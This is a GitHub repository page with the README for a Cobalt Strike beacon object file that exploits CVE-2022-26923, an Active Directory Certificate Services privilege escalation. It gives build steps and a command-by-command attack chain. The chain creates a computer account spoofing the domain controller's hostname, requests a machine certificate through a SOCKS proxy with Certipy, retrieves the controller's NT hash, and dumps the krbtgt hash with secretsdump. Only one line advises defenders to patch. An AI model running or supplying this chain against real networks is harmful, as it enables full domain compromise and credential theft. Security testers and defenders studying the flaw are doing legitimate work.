Skip to content

Latest commit

 

History

History

CVE-2022-26923

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
SOURCE
SOURCE
 
 
CVE-2022-26923.cna
CVE-2022-26923.cna
 
 
CVE-2022-26923_bof.s1.py
CVE-2022-26923_bof.s1.py
 
 
README.md
README.md
 
 

README.md

CVE-2022-26923 BOF

A BOF version of the Active Directory Certificate Services (AD CS) Domain Privilege Escalation exploit (CVE-2022-26923) published by @ly4k_. This code is based on our AddMachineAccount BOF with some minor changes regarding the dNSHostName and servicePrincipalName attributes.

For all technical details refer to the following excellent blogpost by Oliver Lyak (@ly4k_): Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923).

How to compile

  1. Make sure that Mingw-w64 (including mingw-w64-binutils) has been installed.
  2. Enter the SOURCE folder within the tool folder.
  3. Type "make" to compile the object files.
  4. Use Cobal Strike script manager to import the CVE-2022-26923.cna script.

Usage

Running the tools is straightforward. Once you imported the CNA script using Cobalt Strike's Script Manager, they are available as Cobalt Strike commands that can be executed within a beacon. This tools supports the following commands:

  • CVE-2022-26923 [*Computername] [Optional Password]

* Computername does not have to end with an $ ​​character.

Example attack

Create a new computer account named DCPWN with the dNSHostName attribute set to the domain controller's FQDN.

CVE-2022-26923 DCPWN

If the DC is not patched and the new computer account is successfully created, configure a SOCKS proxy on the beacon.

socks <port>

On the teamserver, or any other machine that can access the socks port on the teamserver, install Certipy. Use Certipy in combination with proxychains to request a machine certificate.

proxychains certipy req 'example.local/DCPWN$:<Password>@<CA server IP>' -ca <CA-NAME> -template Machine

Then, use Certipy in combination with proxychains to authenticate to the domain using the requested certificate.

proxychains certipy auth -pfx dc2019.pfx -dc-ip <DC IP>

Finally, use the obtained NT hash of the domain controller to stage other attacks (such as performing a DCsync operation).

proxychains secretsdump.py 'example.local/DC2019$@<DC IP>' -hashes :<DC NT Hash> -just-dc-user krbtgt

Note to Blue

To mitigate the vulnerability install Microsoft's patches released on May 2022.

Support

This BOF tool has been successfully compiled on Mac OSX systems and used on Windows 8.1+ (x64) systems. Compiling the BOF code should also work on other systems (Linux, Windows) that have the Mingw-w64 compiler installed.